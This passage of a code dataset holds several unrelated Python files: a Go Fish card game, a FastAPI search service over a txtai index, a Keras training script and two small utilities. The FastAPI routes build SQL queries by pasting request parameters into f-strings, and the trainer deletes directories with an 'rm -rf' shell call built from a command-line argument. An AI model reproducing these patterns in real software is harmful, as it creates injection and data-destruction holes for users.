sort_dict=DEFAULT_SORT_DICT):\n return self.gt(other, sort_dict) or self.eq(other, sort_dict)\n ge = __ge__\n\n def __le__(self, other, sort_dict=DEFAULT_SORT_DICT):\n return self.lt(other, sort_dict) or self.eq(other, sort_dict)\n le = __le__\n\n def __str__(self, symbols=None):\n symdict = {\n None:self.suit,\n 'black':LETTER_2_BLACK_SYMBOL[self.suit],\n 'white':LETTER_2_WHITE_SYMBOL[self.suit],\n }\n suit = symdict.get(symbols, self.suit)\n return self.rank + suit\n str = __str__\n\n def __repr__(self):\n return \"Card({}, {})\".format(self.rank, self.suit)\n\n\nclass Stack:\n def __init__(self, cards=[]):\n self.cards = [Card(thing) for thing in cards]\n self.sort_dict = None\n\n def __str__(self, symbols=None):\n list = [card.str(symbols) for card in self.cards]\n return \"{}\".format(list)\n str = __str__\n\n def __repr__(self):\n return \"Stack({})\".format(str(self))\n\n def list(self):\n return self.cards\n\n def tuple(self):\n return tuple(self.cards)\n\n def __set__(self):\n return set(self.cards)\n\n def __iter__(self):\n return iter(self.cards)\n\n def __getitem__(self, item):\n return self.cards[item]\n\n def __len__(self):\n return len(self.cards)\n\n def __eq__(self, other):\n return self.cards == other.cards\n\n def __ne__(self, other):\n return not self == other\n\n @property\n def size(self):\n return len(self.cards)\n\n def shuffle(self, times=1):\n for _ in range(times):\n random.shuffle(self.cards)\n\n def compare_stacks(self, other, to_sort=True):\n x = self.copy()\n y = other.copy()\n if to_sort:\n x.sort()\n y.sort()\n return x == y\n\n def add(self, card, end=TOP):\n card = Card(card)\n if end is TOP:\n self.cards.insert(0, card)\n elif end is BOTTOM:\n self.cards.append(card)\n else:\n raise ValueError(\"end is not 'TOP' or 'BOTTOM'\")\n\n def add_list(self, cards, end=TOP):\n cards = list(cards)\n if end is TOP:\n self.cards = cards + self.cards\n elif end is BOTTOM:\n self.cards = self.cards + cards\n else:\n raise ValueError(\"end is not 'TOP' or 'BOTTOM'\")\n\n 
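# Illustrative usage of this module's API (an added example, not part of the\n    # original file; it relies only on new_deck() and the methods defined here):\n    #   deck = new_deck(shuffle=True, jokers=2)  # 52 French-suited cards + 2 jokers\n    #   hand = deck.deal(5)                      # Stack of 5 cards taken off the TOP\n    #   hand.sort()                              # ranks-first DEFAULT_SORT_DICT order\n\n    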
def deal(self, num=1, end=TOP):\n stack = []\n if end is TOP:\n x = 0\n elif end is BOTTOM:\n x = -1\n else:\n raise ValueError(\"end is not 'TOP' or 'BOTTOM'\")\n for i in range(num):\n try:\n stack.append(self.cards[x])\n del self.cards[x]\n except IndexError:\n return Stack(stack)\n return Stack(stack)\n\n def empty(self, return_cards=False):\n if return_cards:\n x = self.cards\n else:\n x = None\n self.cards = []\n return x\n\n def is_empty(self):\n return True if self.cards == [] else False\n\n def find(self, term, limit=0):\n return_list = []\n for card in self.cards:\n if term in card or str(term) == card:\n return_list.append(self.cards.index(card))\n if (not (limit <= 0)) and len(return_list) == limit:\n return return_list\n return return_list\n\n def find_list(self, terms, limit=0):\n return_list =[]\n for term in terms:\n return_list.append(self.find(term, limit))\n return return_list\n\n def get(self, term, limit=0):\n return_list = []\n for card in self.cards:\n if term in card or str(term) == card:\n return_list.append(card)\n if (not (limit <= 0)) and len(return_list) == limit:\n return return_list\n return return_list\n\n def get_list(self, terms, limit=0):\n return_list =[]\n for term in terms:\n return_list += self.get(term, limit)\n return return_list\n\n def insert(self, card, index=-1):\n self.cards.insert(index, card)\n\n def insert_list(self, cards, index=-1):\n self.cards.insert(index, cards)\n\n def remove(self, term):\n for card in self.cards[:]:\n if term in card or term == card:\n self.cards.remove(card)\n\n def remove_list(self, terms):\n card_list = self.get_list(terms)\n for card in card_list:\n self.cards.remove(card)\n\n def random_card(self, remove=False, num=1):\n card = random.sample(self.cards, num)[0]\n if remove:\n del self.cards[self.cards.index(card)]\n return card\n\n def reverse(self):\n self.cards = self.cards[::-1]\n\n def set_cards(self, cards):\n self.cards = list(cards)\n\n def split(self, index=None):\n if index is None:\n index = len(self.cards) // 2\n return Stack(self.cards[:index]), Stack(self.cards[index:])\n\n def copy(self):\n return Stack(self.cards)\n\n def max(self, num=1, sort_dict=DEFAULT_SORT_DICT, ranks_first=True):\n temp = self.copy()\n temp.sort(sort_dict, ranks_first, True)\n return_list = []\n for i in range(num):\n return_list.append(temp.cards[i])\n return return_list\n\n def min(self, num=1, sort_dict=DEFAULT_SORT_DICT, ranks_first=True):\n temp = self.copy()\n temp.sort(sort_dict, ranks_first, False)\n return_list = []\n for i in range(num):\n return_list.append(temp.cards[i])\n return return_list\n\n def sort(self, sort_dict=DEFAULT_SORT_DICT, ranks_first=True, reverse=False):\n if sort_dict != self.sort_dict:\n self.sort_dict = sort_dict\n if 'suits' in self.sort_dict and 'ranks' in self.sort_dict:\n if ranks_first:\n ranks_dict = {}\n for card in self.cards:\n if card.rank in ranks_dict:\n ranks_dict[card.rank].append(card)\n else:\n ranks_dict[card.rank] = [card]\n for rank in ranks_dict:\n ranks_dict[rank].sort(key=self._sort_key_func_card_suit, reverse=reverse)\n ranks_list = list(ranks_dict)\n ranks_list.sort(key=self._sort_key_func_rank, reverse=reverse)\n self.cards = []\n for rank in ranks_list:\n for card in ranks_dict[rank]:\n self.cards.append(card)\n else:\n suits_dict = {}\n for card in self.cards:\n if card.suit in suits_dict:\n suits_dict[card.suit].append(card)\n else:\n suits_dict[card.suit] = [card]\n for suit in suits_dict:\n suits_dict[suit].sort(key=self._sort_key_func_card_rank, 
reverse=reverse)\n suits_list = list(suits_dict)\n suits_list.sort(key=self._sort_key_func_suit, reverse=reverse)\n self.cards = []\n for suit in suits_list:\n for card in suits_dict[suit]:\n self.cards.append(card)\n elif 'ranks' in self.sort_dict:\n self.cards.sort(key=self._sort_key_func_card_rank, reverse=reverse)\n elif 'suits' in self.sort_dict:\n self.cards.sort(key=self._sort_key_func_card_suit, reverse=reverse)\n else:\n raise KeyError(\"'suits' or 'ranks' not found in sorting dictionary\")\n\n def is_sorted(self, sort_dict=DEFAULT_SORT_DICT, ranks_first=True):\n other = self.copy()\n other.sort(sort_dict, ranks_first)\n return self == other\n\n def _sort_key_func_rank(self, rank):\n return self.sort_dict['ranks'][rank]\n\n def _sort_key_func_suit(self, suit):\n return self.sort_dict['suits'][suit]\n\n def _sort_key_func_card_rank(self, card):\n return self.sort_dict['ranks'][card.rank]\n\n def _sort_key_func_card_suit(self, card):\n return self.sort_dict['suits'][card.suit]\n\n\nclass GoFishGame:\n def __init__(self, ranks=FRENCH_RANKS, suits=FRENCH_SUITS):\n self.deck = new_deck(ranks=ranks, suits=suits, shuffle=True)\n self.ranks = ranks\n self.suits = suits\n self.players = []\n self.hand_size = 6 if len(self.players) < 5 else 5\n self.quit = False\n\n def prepare(self):\n assert len(self.players) in (3,4,5,6), \"go fish supports 3-6 players\"\n random.shuffle(self.players) #first player chosen at random\n if self.verbose:\n print('='*80)\n print(\"Player order:\")\n for player in self.players:\n print(\"{}. {}\".format(self.players.index(player)+1, player))\n for player in self.players:\n player.hand = self.deck.deal(self.hand_size)\n for player in self.players:\n player.prepare()\n self.continue_prompt()\n\n def run(self, verbose=True, symbols=None):\n self.verbose = verbose\n self.symbols = symbols\n self.prepare()\n while not self.quit:\n for player in self.players:\n if self.quit:\n break\n if self.verbose:\n print('='*80)\n print(\"{}'s turn:\".format(player.name))\n print(\"Number of cards: {}\".format(player.num_cards))\n print(\"Tricks: {}\".format(player.tricks))\n print(\"Points: {}\".format(player.points))\n self.continue_prompt()\n while not self.quit:\n if self.verbose:\n print('='*80)\n player.hand.sort()\n if not player.hand.is_empty():\n askee, rank = player.ask()\n else:\n if self.deck.is_empty():\n if self.verbose:\n print(\"{} has no cards and the deck is empty!\".format(player))\n break\n else:\n self.check_for_empty(askee)\n askee, rank = player.ask()\n cards = askee.hand.get(rank)\n if self.verbose:\n print(\"{} asked {} for a {}!\".format(player, askee, rank))\n if cards == []:\n self.update_players(DNH, player, askee, rank)\n if self.verbose:\n print(\"{} said to go fish!\".format(askee))\n if self.deck.is_empty():\n if self.verbose:\n print(\"The deck is empty!\")\n self.continue_prompt()\n break\n else:\n card = self.deck.deal()[0]\n player.hand.add(card)\n if rank == card.rank:\n self.update_players(GFC, player, rank)\n if self.verbose:\n print(\"{} went fishing and drew a {}!\".format(player, rank))\n self.check_for_tricks(player)\n else:\n self.update_players(GOF, player)\n if self.verbose:\n print(\"{} went fishing!\".format(player))\n self.check_for_tricks(player)\n if self.verbose:\n self.continue_prompt()\n break\n else:\n self.update_players(RCV, player, askee, rank, len(cards))\n askee.hand.remove_list([str(card) for card in cards])\n player.hand.add_list(cards)\n if self.verbose:\n print(\"{} gave {} {}(s) to {}!\".format(askee, len(cards), 
rank, player))\n self.check_for_tricks(player)\n self.check_for_empty(askee)\n self.check_for_empty(player)\n if self.verbose:\n self.continue_prompt()\n print(\"Game exited.\")\n\n def add_player(self, player, name, *args, **kwargs):\n self.players.append(player(name, self, *args, **kwargs))\n\n def check_for_empty(self, player):\n if player.hand.is_empty() and not self.quit:\n player.hand = self.deck.deal(self.hand_size)\n self.update_players(RDH, player)\n if self.verbose:\n print(\"{} ran out of cards!\".format(player))\n print(\"{} was redealt {} cards!\".format(player, len(player.hand)))\n self.check_for_tricks(player)\n\n def check_for_tricks(self, player):\n tricks = {}\n for card in player.hand:\n if card.rank in tricks:\n tricks[card.rank] += 1\n else:\n tricks[card.rank] = 1\n for rank in tricks:\n if tricks[rank] == len(self.suits):\n player.tricks.append(rank)\n player.hand.remove_list([rank])\n if self.verbose:\n print(\"{} takes a trick of {}s!\".format(player, rank))\n self.update_players(TAT, player, rank)\n self.check_for_win()\n\n def check_for_win(self):\n tricks_list = []\n for player in self.players:\n tricks_list += player.tricks\n if len(tricks_list) == len(self.ranks):\n self.quit = True\n if self.verbose:\n print('='*80)\n print(\"The game is over!\")\n self.players.sort(key=self._sort_key_func_player_tricks, reverse=True)\n for player in self.players:\n print(\"{}. {}, with {} point(s)\".format(self.players.index(player)+1, player, player.points))\n return\n\n def _sort_key_func_player_tricks(self, player):\n return player.points\n\n def continue_prompt(self):\n r = input(\"Press [Enter] to continue (or type 'q' to quit): \")\n if r.lower() in ('q', 'quit'):\n r = input(\"Are you sure you want to quit? (y/n): \")\n if r.lower() in ('y', 'yes'):\n self.quit = True\n\n def update_players(self, action, *args):\n for player in self.players:\n player.update(action, *args)\n\n\nclass GoFishPlayer:\n def __init__(self, name, game):\n self.name = name\n self.game = game\n self.hand = Stack()\n self.tricks = []\n\n def __str__(self):\n return self.name\n\n @property\n def points(self):\n return len(self.tricks)\n\n @property\n def num_cards(self):\n return len(self.hand)\n\n def prepare(self):\n pass\n\n def update(self, action, *args):\n pass\n\n def ask(self):\n raise Exception(\"'ask' method should be overwritten in child class\")\n\n\nclass GoFishHuman(GoFishPlayer):\n def ask(self):\n print(\"Your cards: \", self.hand.str(self.game.symbols))\n askee = self.ask_for_askee()\n rank = self.ask_for_rank()\n return askee, rank\n\n def ask_for_askee(self):\n player_list = self.game.players[:]\n player_list.remove(self)\n str_list = [str(player) for player in player_list]\n while True:\n askee = input(\"Who do you want to ask? {}: \".format(str_list))\n if askee in str_list:\n askee = player_list[str_list.index(askee)]\n return askee\n else:\n print(\"That is not a player in the game.\")\n\n def ask_for_rank(self):\n ranks_list = [card.rank for card in self.hand]\n while True:\n rank = input(\"What rank do you want to ask for? 
\")\n if rank in ranks_list:\n return rank\n else:\n print(\"That is not a rank in your hand.\")\n\n\nclass GoFishAIPerfectMemory(GoFishPlayer):\n def __init__(self, name, game, memory_percent=1):\n GoFishPlayer.__init__(self, name, game)\n self.memory_percent = memory_percent\n self.memory = {}\n self.update_dict = {\n DNH:self.update_DNH,\n RCV:self.update_RCV,\n TAT:self.update_TAT,\n GOF:self.update_GOF,\n GFC:self.update_GFC,\n RDH:self.update_RDH,\n }\n\n def prepare(self):\n for player in self.game.players:\n self.memory[player] = {\n 'has':{},\n 'dnh':[],\n }\n\n def update(self, action, *args):\n self.update_dict[action](*args)\n\n def update_DNH(self, player, askee, rank):\n if not rank in self.memory[player]['has']:\n self.memory[player]['has'][rank] = 1\n self.memory[askee]['dnh'].append(rank)\n\n def update_RCV(self, player, askee, rank, num):\n if rank in self.memory[player]['has']:\n self.memory[player]['has'][rank] += num\n else:\n self.memory[player]['has'][rank] = num + 1\n if rank in self.memory[askee]['has']:\n del self.memory[askee]['has'][rank]\n self.memory[askee]['dnh'].append(rank)\n\n def update_TAT(self, player, rank):\n if rank in self.memory[player]['has']:\n del self.memory[player]['has'][rank]\n\n def update_GOF(self, player):\n self.memory[player]['dnh'] = []\n\n def update_GFC(self, player, rank):\n self.memory[player]['has'][rank] += 1\n\n def update_RDH(self, player):\n self.memory[player]['has'] = {}\n self.memory[player]['dnh'] = []\n\n def ask(self):\n player_list = [player for player in self.memory]\n card_list = [card for card in self.hand]\n for player in player_list:\n if player == self:\n continue\n for card in card_list:\n if card.rank in self.memory[player]['has']:\n return player, card.rank\n random.shuffle(player_list)\n random.shuffle(card_list)\n for player in player_list:\n if player == self:\n continue\n for card in card_list:\n if not card.rank in self.memory[player]['dnh']:\n return player, card.rank\n\n\nclass GoFishAIRandom(GoFishPlayer):\n def ask(self):\n player_list = self.game.players[:]\n player_list.remove(self)\n askee = random.choice(player_list)\n ranks_list = [card.rank for card in self.hand]\n rank = random.choice(ranks_list)\n return askee, rank\n\n\ndef main():\n g = GoFishGame(ranks=FRENCH_RANKS, suits=FRENCH_SUITS)\n g.add_player(GoFishAIRandom, input(\"Name AI 1: \"))\n g.add_player(GoFishAIPerfectMemory, input(\"Name AI 2: \"))\n g.add_player(GoFishHuman, input(\"Name player 1: \"))\n g.add_player(GoFishHuman, input(\"Name player 2: \"))\n g.run(symbols='black')\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"Binary-Ninja/go-pie","sub_path":"pydeck.py","file_name":"pydeck.py","file_ext":"py","file_size_in_byte":24477,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"70612503891","text":"from contextlib import asynccontextmanager\nfrom app.utils import log_sql\nfrom app.types import Documents, Document, DocumentData, DocumentDataFull\nfrom app.third_party.txtai import initialize_embeddings, get_embeddings_by_user\nfrom app.third_party.firebase_admin import initialize_firebase_admin, verify_firebase_token\nfrom starlette.requests import Request\nimport datetime\nimport json\nimport os\n\nfrom fastapi import FastAPI, Depends\nfrom fastapi.middleware.cors import CORSMiddleware\n@asynccontextmanager\nasync def startup(app: FastAPI):\n # initialize embeddings so it loads faster later\n initialize_embeddings()\n initialize_firebase_admin()\n yield\n\nrouter 
= FastAPI(\n lifespan=startup,\n dependencies=[Depends(verify_firebase_token), Depends(get_embeddings_by_user)]\n)\norigins = [os.environ['FRONTEND_URL']]\nrouter.add_middleware(\n CORSMiddleware,\n allow_origins=origins,\n allow_credentials=True,\n allow_methods=[\"*\"],\n allow_headers=[\"*\"],\n)\n\n@router.get(\"/recipients\", response_model=list[str])\nasync def recipients(request: Request, source: str):\n if not request.state.has_data: return []\n embeddings = request.state.embeddings\n sql_query = f'SELECT DISTINCT recipient FROM txtai WHERE source = \"{source}\" LIMIT 100'\n log_sql(sql_query)\n recipients = embeddings.search(sql_query)\n embeddings.close()\n has_recipient = lambda recipient: 'recipient' in recipient and recipient['recipient']\n return [recipient['recipient'] for recipient in recipients if has_recipient(recipient)]\n\ndef format_data_response(docs: list[DocumentData]):\n return [json.loads(doc['data']) for doc in docs]\n\n@router.get(\"/search\", response_model=list[DocumentDataFull])\nasync def search(\n request: Request,\n q: str,\n from_date: str = None,\n to_date: str = None,\n limit: int = 100,\n offset: int = 0,\n sort_by: str = \"timestamp_ms\",\n order: str = \"desc\",\n recipient: str = \"\",\n source: str = \"\",\n):\n sql_query = f'SELECT data FROM txtai WHERE similar({q})'\n\n if from_date and to_date:\n sql_query += f' AND date BETWEEN \"{from_date}\" AND \"{to_date}\"'\n elif from_date:\n sql_query += f' AND date = \"{from_date}\"'\n elif to_date:\n sql_query += f' AND date = \"{to_date}\"'\n\n if recipient:\n sql_query += f' AND recipient = \"{recipient}\"'\n if source:\n sql_query += f' AND source = \"{source}\"'\n\n sql_query += f' LIMIT {limit}'\n\n log_sql(sql_query)\n\n embeddings = request.state.embeddings\n docs = embeddings.search(sql_query)\n embeddings.close()\n return format_data_response(docs)\n\n@router.get(\"/day\", response_model=list[DocumentDataFull])\nasync def day(request: Request, date: datetime.date, recipient: str, source: str):\n embeddings = request.state.embeddings\n sql_query = f'SELECT data FROM txtai WHERE date = \"{date}\" AND recipient = \"{recipient}\" AND source = \"{source}\" LIMIT 100'\n log_sql(sql_query)\n docs = embeddings.search(sql_query)\n embeddings.close()\n return format_data_response(docs)\n\n@router.get(\"/first_day\", response_model=list[DocumentDataFull])\nasync def first_day(request: Request, recipient: str, source: str):\n embeddings = request.state.embeddings\n # Find the first entry, get the date\n date_query = f'SELECT DATE(date) AS first_day FROM txtai WHERE recipient = \"{recipient}\" AND source = \"{source}\" ORDER BY date ASC LIMIT 1'\n log_sql(date_query)\n dates = embeddings.search(date_query)\n if not dates or len(dates) < 1 or 'first_day' not in dates[0]:\n return []\n first_day = dates[0]['first_day']\n\n # then get subsequent entries that have the same date\n sql_query = f'SELECT data FROM txtai WHERE date = \"{first_day}\" AND recipient = \"{recipient}\" AND source = \"{source}\" LIMIT 100'\n log_sql(sql_query)\n docs = embeddings.search(sql_query)\n embeddings.close()\n return format_data_response(docs)\n\n@router.get(\"/last_day\", response_model=list[DocumentDataFull])\nasync def last_day(request: Request, recipient: str, source: str):\n embeddings = request.state.embeddings\n # Find the first entry, get the date\n date_query = f'SELECT DATE(date) AS last_day FROM txtai WHERE recipient = \"{recipient}\" AND source = \"{source}\" ORDER BY date DESC LIMIT 1'\n log_sql(date_query)\n dates 
= embeddings.search(date_query)\n if not dates or len(dates) < 1 or 'last_day' not in dates[0]:\n return []\n last_day = dates[0]['last_day']\n\n # then get subsequent entries that have the same date\n sql_query = f'SELECT data FROM txtai WHERE date = \"{last_day}\" AND recipient = \"{recipient}\" AND source = \"{source}\" LIMIT 100'\n log_sql(sql_query)\n docs = embeddings.search(sql_query)\n embeddings.close()\n return format_data_response(docs)\n\ndef format_doc_data(data: DocumentData, source: str, recipient: str) -> DocumentDataFull:\n doc = DocumentDataFull(\n text=data.text,\n timestamp=int(data.timestamp),\n sender=data.sender,\n recipient=recipient,\n line_number=data.line_number,\n source_metadata=json.dumps(data.source_metadata),\n date=datetime.date.fromtimestamp(data.timestamp),\n source=source,\n )\n doc.date = doc.date.strftime(\"%Y-%m-%d\")\n return vars(doc)\n\n# txtai wants documents in tuples\ndef format_doc(data: DocumentData, source: str, recipient: str):\n return ('-'.join([recipient, str(data.timestamp)]), format_doc_data(data, source, recipient), \"\")\n\n# pass source/recipient to be stored for each document\ndef format_docs(docs: Documents) -> list[Document]:\n return [format_doc(doc, docs.source, docs.recipient) for doc in docs.docs]\n\n@router.post(\"/index\")\nasync def index(request: Request, docs: Documents):\n embeddings = request.state.embeddings\n formatted_docs = format_docs(docs)\n embeddings.upsert(formatted_docs)\n embeddings.save(path=request.state.user_path)\n embeddings.close()\n\n@router.delete(\"/delete\")\nasync def delete(request: Request, recipient: str, source: str):\n embeddings = request.state.embeddings\n sql_query = f'SELECT id FROM txtai WHERE recipient = \"{recipient}\" AND source = \"{source}\" LIMIT 10000'\n log_sql(sql_query)\n ids_to_delete = embeddings.search(sql_query)\n ids_deleted = embeddings.delete([id_to_delete['id'] for id_to_delete in ids_to_delete])\n embeddings.save(path=request.state.user_path)\n embeddings.close()","repo_name":"xiankai/vector-database","sub_path":"app/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6148,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"5601523111","text":"import os\nfrom distutils.util import strtobool\n\nimport keras.backend as K\nfrom sklearn.model_selection import KFold\n\nfrom sarcopenia_ai.apps.slice_detection.callbacks import PreviewOutput\nfrom sarcopenia_ai.apps.slice_detection.dataloader import TrainerData\nfrom sarcopenia_ai.core.input_parser import InputParser\nfrom sarcopenia_ai.core.model_wrapper import allocate_tf_gpu_devices\nfrom .models import get_model\n\n\ndef parse_inputs():\n parser = InputParser()\n\n parser.add_argument('--restart', type=strtobool, default=False,\n help='restart training by deleting all associated files')\n parser.add_argument('--num_epochs', type=int, default=5, help='number of epochs for training')\n parser.add_argument('--batch_size', type=int, default=3,\n help='number of distinct images to samples from in a given batch')\n parser.add_argument('--img_batch_size', type=int, default=3,\n help='number of samples obtained from a single image in a given batch')\n parser.add_argument('--input_shape', type=int, default=None, nargs=3,\n help='image input shape')\n parser.add_argument('--model_input_shape', type=int, default=[None, None, 1], nargs=3,\n help='model input shape')\n parser.add_argument('--model_name', type=str, default='UNet', help='name of model')\n 
parser.add_argument('--dataset_path', type=str, default=None, help='location of dataset .npz')\n parser.add_argument('--n_splits', type=int, default=3,\n help='number of splits for cross validation')\n parser.add_argument('--random_state', type=int, default=42, help='random seed')\n parser.add_argument('--ds_factor', type=int, default=2, help='output downsampling factor')\n parser.add_argument('--input_spacing', type=int, default=1, help='spacing of input image')\n parser.add_argument('--num_val', type=int, default=20,\n help='number of validation samples during training')\n parser.add_argument('--do_crossval', type=strtobool, default=False, help='do cross validation')\n parser.add_argument('--flatten_output', type=strtobool, default=False,\n help='1D output if true; otherwise, the output is 2D')\n parser.add_argument('--use_cache', type=strtobool, default=True,\n help='cache input image pre-processing')\n parser.add_argument('--cache_path', type=str, default=None,\n\n help='path to store the pre-processed images. If None, then model_path is used')\n parser.add_argument('--mode', type=str, default='heatmap',\n help='labelmap as heatmap or regression', choices=['heatmap', 'reg'])\n parser.add_argument('--image_type', type=str, default='frontal', choices=['frontal', 'sagittal'])\n parser.add_argument('--cuda_devices', type=str, default='')\n parser.add_argument('--model_path', type=str, default='/tmp/slice_detection_1/')\n parser.add_argument('--sigma', type=float, default=3)\n parser.add_argument('--sampling_rate', type=float, default=0.5,\n help='rate to sample from crops that contain the slice')\n parser.add_argument('--do_augment', type=strtobool, default=True, help='enable augmentation')\n parser.add_argument('--preview_generator_output', type=strtobool, default=False,\n help='preview generator output')\n parser.add_argument('--preview_training_output', type=strtobool, default=False,\n help='preview intermediate training output')\n parser.add_argument('--preview_validation_steps', type=int, default=2)\n parser.add_argument('--regression_dual_output', type=strtobool, default=False,\n help='enable dual output for regression')\n parser.add_argument('--do_checkpoint', type=strtobool, default=False,\n help='enable model checkpoint saving')\n parser.add_argument('--workers', type=int, default=2)\n parser.add_argument('--steps_per_epoch', type=int, default=None)\n args = parser.parse()\n\n return args\n\n\ndef distance(y_true, y_pred):\n x_true = K.flatten(K.argmax(y_true, axis=1))\n valid = K.cast(K.sum(y_true, axis=(1, 2)) > 0.5, 'float32')\n\n x_pred = K.flatten(K.argmax(y_pred, axis=1))\n d = K.cast(x_true - x_pred, 'float32')\n return valid * d * d\n\n\ndef cross_validate(base_model, args):\n trainer_data = TrainerData(args)\n kf = KFold(n_splits=args.n_splits, random_state=args.random_state, shuffle=True)\n\n for idx, (train_index, val_index) in enumerate(kf.split(list(range(trainer_data.num_samples)))):\n print('cross validation step {} of {}'.format(idx + 1, args.n_splits))\n\n trainer_data.split_data(train_index, val_index)\n trainer_data.update_crossval_data(idx)\n trainer_data.save_train_val_split(True)\n\n if args.preview_generator_output:\n trainer_data.preview_generator_output()\n\n # Setup model\n model_name = args.model_name + '_cv_' + str(idx + 1) + '_of_' + str(args.n_splits)\n model_wrapper = base_model(model_dir=args.model_path,\n name=model_name,\n config=args,\n data_loader=trainer_data)\n\n if args.preview_training_output:\n 
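The `distance` metric defined just below the argument parser above scores slice localisation as a validity-masked squared difference of argmax rows. A small NumPy sanity check of the same arithmetic on toy heatmaps of shape (batch, height, 1) — the map shape is an assumption, since the model configuration is not part of the record:

import numpy as np

def distance_np(y_true, y_pred):
    # Mirror of the Keras `distance` metric: squared error between the
    # argmax rows, zeroed out for samples whose label map is empty.
    x_true = np.argmax(y_true, axis=1).ravel()
    x_pred = np.argmax(y_pred, axis=1).ravel()
    valid = (y_true.sum(axis=(1, 2)) > 0.5).astype(float)
    d = (x_true - x_pred).astype(float)
    return valid * d * d

y_true = np.zeros((2, 8, 1)); y_true[0, 5, 0] = 1.0   # slice at row 5; sample 2 unlabeled
y_pred = np.zeros((2, 8, 1)); y_pred[0, 3, 0] = 1.0; y_pred[1, 7, 0] = 1.0
print(distance_np(y_true, y_pred))                    # -> [4. 0.]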
model_wrapper.callbacks.append(PreviewOutput(trainer_data, args.preview_validation_steps, args))\n\n print(model_wrapper.model.summary())\n\n try:\n model_wrapper.train_generator()\n\n except KeyboardInterrupt:\n pass\n\n model_wrapper.save()\n\n\ndef main():\n args = parse_inputs()\n\n print(args)\n\n args.num_gpus, args.cuda_devices = allocate_tf_gpu_devices(args.cuda_devices)\n args.is_multi_gpu = args.num_gpus > 1\n\n # Handle restarting and resuming training\n if args.restart:\n print('Restarting training from scratch.')\n os.system('rm -rf {}'.format(args.model_path))\n\n if not os.path.isdir(args.model_path):\n os.system('mkdir -p {}'.format(args.model_path))\n else:\n print('Resuming training on model_path {}'.format(args.model_path))\n\n base_model = get_model(args.model_name)\n\n if args.do_crossval:\n cross_validate(base_model, args)\n else:\n trainer_data = TrainerData(args)\n trainer_data.split_data()\n\n if args.preview_generator_output:\n trainer_data.preview_generator_output()\n\n # Setup model\n model_wrapper = base_model(model_dir=args.model_path,\n name=args.model_name,\n config=args,\n data_loader=trainer_data)\n\n model_wrapper.compile({'metrics': ['accuracy', distance]})\n\n if args.preview_training_output:\n model_wrapper.callbacks.append(\n PreviewOutput(trainer_data, validation_steps=args.preview_validation_steps, config=args))\n\n print(model_wrapper.model.summary())\n\n try:\n model_wrapper.train_generator()\n\n except KeyboardInterrupt:\n pass\n\n model_wrapper.save()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"fk128/sarcopenia-ai","sub_path":"sarcopenia_ai/apps/slice_detection/trainer.py","file_name":"trainer.py","file_ext":"py","file_size_in_byte":7212,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"66"} +{"seq_id":"73312685011","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n\nimport os,re\nfrom datetime import datetime\n\nprint(\"--- --- begin --- ---\")\n\nheader = [\"---\",\"\",\"layout: page\",\"title: 笔记\",\"update: \"+datetime.now().strftime(\"%Y-%m-%d\")+\" +0800\",\"\",\"---\",\"个人整理自用的技术向笔记文章,比较零碎所以不用博文的形式更新\"]\n\ndir = [x for x in os.listdir(\".\") if os.path.isdir(x)]\nindex = open(\"index.md\",\"w\")\n\nfor x in header:\n index.write(x+\"\\n\")\nfor x in sorted(dir):\n index.write(\"## \"+x+\"\\n\\n\")\n os.chdir(x)\n file = os.listdir(\".\")\n for y in sorted(file):\n if not y.endswith('.md'):\n continue\n pattern = re.compile(u\"title: (.*)\")\n for line in open(y,\"r\"):\n #print(line)\n result = pattern.findall(line)\n if result:\n print(result[0])\n index.write(\"《\"+result[0]+\"》\\n\\n\")\n os.chdir(\"..\")\n index.write(\"\\n\")\n\nprint(\"--- --- done --- ---\")\n\n","repo_name":"ypingcn/ypingcn.github.io","sub_path":"notes/index-generate.py","file_name":"index-generate.py","file_ext":"py","file_size_in_byte":1034,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"17550244940","text":"import csv\n\n### 商品クラス\nclass Item:\n def __init__(self,item_code,item_name,price):\n self.item_code = item_code\n self.item_name = item_name\n self.price = price\n\n def get_price(self):\n return self.price\n\n## オーダークラス\nclass Order:\n def __init__(self,item_master):\n self.item_order_list = []\n self.item_master = item_master\n self.item_count = 0\n self.item_sum_price = 0\n self.change = 0\n\n def add_item_order(self,item_code,quantity):\n self.item_order_list.append([item_code,quantity])\n\n def view_item_list(self):\n for master 
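`main()` in the trainer above resets the model directory by shelling out to `rm -rf` and `mkdir -p`, which does nothing on Windows and hides failures behind an unchecked exit code. A portable standard-library equivalent; `reset_model_dir` is a hypothetical helper name:

import os
import shutil

def reset_model_dir(model_path: str, restart: bool) -> None:
    # Same effect as the shell calls: wipe on restart, then create-if-missing.
    if restart:
        shutil.rmtree(model_path, ignore_errors=True)
    os.makedirs(model_path, exist_ok=True)

reset_model_dir('/tmp/slice_detection_1/', restart=True)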
in self.item_master:\n for item in self.item_order_list:\n # 注文一覧の各コードをマスターと比較\n if master.item_code == item[0]:\n print(f\"商品コード:{item[0]}|価格:{master.price}|個数:{item[1]}\")\n self.item_count = self.item_count + int(item[1])\n self.item_sum_price = self.item_sum_price + int(item[1]) * int(master.price)\n\n\n def exist_item_master(self,order_code):\n for item in self.item_master:\n if (item.item_code == order_code):\n return True\n\n return False\n\n def total_order(self):\n print(\"\\n#--------------#\")\n print(f\"個数=>{self.item_count}|合計金額=>{self.item_sum_price}\")\n print(\"#--------------#\")\n\n def check_payment(self,diposit):\n self.change = int(diposit) - self.item_sum_price\n\n if self.change < 0:\n return True\n return False\n\n def payment(self):\n print(f\"お釣りの金額は{self.change}です\")\n\n\n## メイン処理\ndef main():\n # アイテムマスタ\n master_csv = \"item_master.csv\"\n csv_file = open(master_csv, 'r')\n # CSVデータを読み込む\n item_list = csv.reader(csv_file)\n # ヘッダーをスキップする\n header = next(item_list)\n\n item_master = []\n for item in item_list:\n item_master.append(Item(item[0],item[1],item[2]))\n\n # オーダーのインスタンス作成し、アイテムマスターをセットする\n order = Order(item_master)\n\n order_code = \"\"\n quantity = 0\n while True:\n order_code = input(\"商品コードを入力してください(オーダーストップはend)=>\")\n if (order_code == 'end'):\n print('注文を終わります')\n break\n\n quantity = 